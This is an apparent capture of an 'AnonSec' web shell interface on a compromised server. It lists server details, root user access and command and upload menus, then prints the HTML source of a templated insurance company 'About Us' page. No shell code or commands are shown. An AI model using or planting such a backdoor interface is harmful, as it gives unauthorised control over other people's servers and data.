|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/community.nickisplace.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>About Us - Community</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<meta name="theme-variant" content="2d4ca8a3f5a22de88aab842f38be38d9">
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="fixed w-full z-50 top-0 bg-gradient-to-r from-teal-600 to-cyan-600 text-white shadow-2xl">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto px-6 py-2">
<a href="./" class="flex items-center space-x-3">
<div class="w-11 h-11 bg-white/20 backdrop-blur-sm rounded-xl flex items-center justify-center border border-white/30">
<span class="text-white font-bold text-lg">C</span>
</div>
<span class="self-center text-xl font-bold">
Community </span>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-white rounded-lg md:hidden hover:bg-white/10">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-semibold flex flex-col md:flex-row md:space-x-8 items-center">
<li><a href="/Home</a></li>
<li><a href="about-us.php" class="block py-2 text-white/90 hover:text-white transition-colors">About</a></li>
<li><a href="blog/" class="block py-2 text-white/90 hover:text-white transition-colors">Blog</a></li>
<li>
<a href="contact.php" class="block py-2.5 px-6 bg-white text-teal-600 rounded-full hover:bg-gray-100 transition-all font-bold shadow-lg">Contact</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="bg-white py-20" id="about">
<div class="max-w-screen-xl mx-auto px-4">
<div class="bg-gray-900 rounded-3xl overflow-hidden">
<div class="grid lg:grid-cols-2">
<div class="p-12 lg:p-20 text-white flex flex-col justify-center">
<div class="inline-block mb-6">
<div class="flex items-center space-x-2">
<div class="w-2 h-2 bg-teal-400 rounded-full"></div>
<div class="w-2 h-2 bg-teal-400 rounded-full"></div>
<div class="w-2 h-2 bg-teal-400 rounded-full"></div>
<span class="ml-2 text-teal-400 font-bold text-sm uppercase">Made-to-Order Insurance</span>
</div>
</div>
<h2 class="text-5xl lg:text-6xl font-black mb-8 leading-tight">
Tailored Insurance Plans for Your Individual Requirements </h2>
<p class="text-lg text-gray-300 mb-10 leading-relaxed">
One of the biggest benefits of working with our agency is our ability to provide customized insurance solutions. We understand that no two situations are the same, which is why we take the time to assess your risks and create a policy that is tailored to your needs. Our team of experts will work with you to identify your priorities and develop a policy that provides the protection you need, without breaking the bank. </p>
<div class="flex flex-wrap gap-4 mb-10">
<div class="px-6 py-3 bg-white/5 rounded-full text-sm font-semibold">🏆 Award Winning</div>
<div class="px-6 py-3 bg-white/5 rounded-full text-sm font-semibold">✨ Certified</div>
<div class="px-6 py-3 bg-white/5 rounded-full text-sm font-semibold">🌍 Global</div>
</div>
<a href="#contact" class="inline-block px-10 py-5 bg-teal-600 text-white font-bold rounded-lg hover:bg-teal-700 transition-all w-fit">
Discover Coverage </a>
</div>
<div class="relative min-h-[600px]">
<img src="https://images.unsplash.com/photo-Q1p7bh3SHj8?w=1200&h=800&fit=crop&auto=format&q=80" alt="About" class="absolute inset-0 w-full h-full object-cover">
</div>
</div>
</div>
</div>
</section>
<section class="bg-gradient-to-b from-gray-900 to-black text-white py-32" id="testimonials">
<div class="max-w-screen-xl mx-auto px-4">
<h2 class="text-7xl font-black text-center mb-20">Client Reviews</h2>
<div class="grid md:grid-cols-3 gap-8">
<div class="relative group">
<div class="absolute inset-0 bg-gradient-to-br from-teal-600 to-cyan-600 rounded-2xl transform group-hover:scale-105 transition-transform"></div>
<div class="relative bg-gray-900 m-1 rounded-2xl p-8">
<div class="flex mb-4">
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
</div>
<p class="text-lg text-gray-300 mb-6 leading-relaxed">
"Code quality, architecture, and performance all exceeded expectations. Best technical partnership we've had."
</p>
<div class="flex items-center space-x-4">
<div class="w-12 h-12 bg-teal-600 rounded-full flex items-center justify-center text-white font-bold text-lg">
NA </div>
<div>
<div class="font-bold">Nicole Adams</div>
<div class="text-sm text-gray-400">VP of Engineering, Vertex Technologies</div>
</div>
</div>
</div>
</div>
<div class="relative group">
<div class="absolute inset-0 bg-gradient-to-br from-teal-600 to-cyan-600 rounded-2xl transform group-hover:scale-105 transition-transform"></div>
<div class="relative bg-gray-900 m-1 rounded-2xl p-8">
<div class="flex mb-4">
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
</div>
<p class="text-lg text-gray-300 mb-6 leading-relaxed">
"Finally, a team that understands both innovation and practicality. Scalability issues are now a thing of the past."
</p>
<div class="flex items-center space-x-4">
<div class="w-12 h-12 bg-teal-600 rounded-full flex items-center justify-center text-white font-bold text-lg">
KZ </div>
<div>
<div class="font-bold">Kevin Zhang</div>
<div class="text-sm text-gray-400">Lead Developer, CodeCraft Studios</div>
</div>
</div>
</div>
</div>
<div class="relative group">
<div class="absolute inset-0 bg-gradient-to-br from-teal-600 to-cyan-600 rounded-2xl transform group-hover:scale-105 transition-transform"></div>
<div class="relative bg-gray-900 m-1 rounded-2xl p-8">
<div class="flex mb-4">
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
<i class="fas fa-star text-yellow-400"></i>
</div>
<p class="text-lg text-gray-300 mb-6 leading-relaxed">
"Cutting-edge solutions that actually deliver. They helped us launch our product 3 months ahead of schedule."
</p>
<div class="flex items-center space-x-4">
<div class="w-12 h-12 bg-teal-600 rounded-full flex items-center justify-center text-white font-bold text-lg">
DW </div>
<div>
<div class="font-bold">Daniel Wright</div>
<div class="text-sm text-gray-400">CTO, FutureTech Labs</div>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="bg-gradient-to-br from-teal-50 via-white to-cyan-50 py-20">
<div class="max-w-screen-xl mx-auto px-4">
<div class="bg-white rounded-3xl shadow-2xl p-12">
<div class="grid md:grid-cols-4 gap-8">
<div class="text-center p-6 bg-gradient-to-br from-teal-50 to-cyan-50 rounded-2xl hover:shadow-lg transition-all">
<div class="w-16 h-16 bg-gradient-to-br from-teal-500 to-cyan-600 rounded-2xl flex items-center justify-center mx-auto mb-4">
<i class="fas fa-users text-white text-xl"></i>
</div>
<div class="text-4xl font-black text-teal-600 mb-2">10K+</div>
<div class="text-gray-700 font-semibold">Users</div>
</div>
<div class="text-center p-6 bg-gradient-to-br from-teal-50 to-cyan-50 rounded-2xl hover:shadow-lg transition-all">
<div class="w-16 h-16 bg-gradient-to-br from-teal-500 to-cyan-600 rounded-2xl flex items-center justify-center mx-auto mb-4">
<i class="fas fa-server text-white text-xl"></i>
</div>
<div class="text-4xl font-black text-teal-600 mb-2">99.9%</div>
<div class="text-gray-700 font-semibold">Uptime</div>
</div>
<div class="text-center p-6 bg-gradient-to-br from-teal-50 to-cyan-50 rounded-2xl hover:shadow-lg transition-all">
<div class="w-16 h-16 bg-gradient-to-br from-teal-500 to-cyan-600 rounded-2xl flex items-center justify-center mx-auto mb-4">
<i class="fas fa-chart-line text-white text-xl"></i>
</div>
<div class="text-4xl font-black text-teal-600 mb-2">$5M+</div>
<div class="text-gray-700 font-semibold">Revenue</div>
</div>
<div class="text-center p-6 bg-gradient-to-br from-teal-50 to-cyan-50 rounded-2xl hover:shadow-lg transition-all">
<div class="w-16 h-16 bg-gradient-to-br from-teal-500 to-cyan-600 rounded-2xl flex items-center justify-center mx-auto mb-4">
<i class="fas fa-globe text-white text-xl"></i>
</div>
<div class="text-4xl font-black text-teal-600 mb-2">50+</div>
<div class="text-gray-700 font-semibold">Countries</div>
</div>
</div>
</div>
</div>
</section>
<footer class="bg-gradient-to-br from-teal-900 via-teal-800 to-cyan-900 text-white py-20">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-12 mb-12">
<div class="md:col-span-2">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-14 h-14 bg-white/20 backdrop-blur-sm rounded-2xl flex items-center justify-center border border-white/30">
<span class="text-white font-bold text-2xl">C</span>
</div>
<span class="text-3xl font-black">Community</span>
</a>
<p class="text-white/80 mb-8 max-w-md leading-relaxed">Building the future, one solution at a time.</p>
<div class="flex space-x-4">
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-white/20 backdrop-blur-sm border border-white/20 rounded-xl flex items-center justify-center transition-all hover:scale-110">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-white/20 backdrop-blur-sm border border-white/20 rounded-xl flex items-center justify-center transition-all hover:scale-110">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-white/20 backdrop-blur-sm border border-white/20 rounded-xl flex items-center justify-center transition-all hover:scale-110">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-white/20 backdrop-blur-sm border border-white/20 rounded-xl flex items-center justify-center transition-all hover:scale-110">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div>
<h3 class="text-lg font-black mb-6">Links</h3>
<ul class="space-y-4 text-white/70">
<li><a href="/Home</a></li>
<li><a href="about-us.php" class="hover:text-white transition-colors">About</a></li>
<li><a href="blog/" class="hover:text-white transition-colors">Blog</a></li>
<li><a href="contact.php" class="hover:text-white transition-colors">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-black mb-6">Legal</h3>
<ul class="space-y-4 text-white/70">
<li><a href="privacy.php" class="hover:text-white transition-colors">Privacy</a></li>
<li><a href="terms.php" class="hover:text-white transition-colors">Terms</a></li>
<li><a href="disclaimer.php" class="hover:text-white transition-colors">Disclaimer</a></li>
</ul>
</div>
</div>
<div class="border-t border-white/20 pt-8">
<p class="text-white/70 text-sm text-center">© 2026 Community. All rights reserved.</p>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021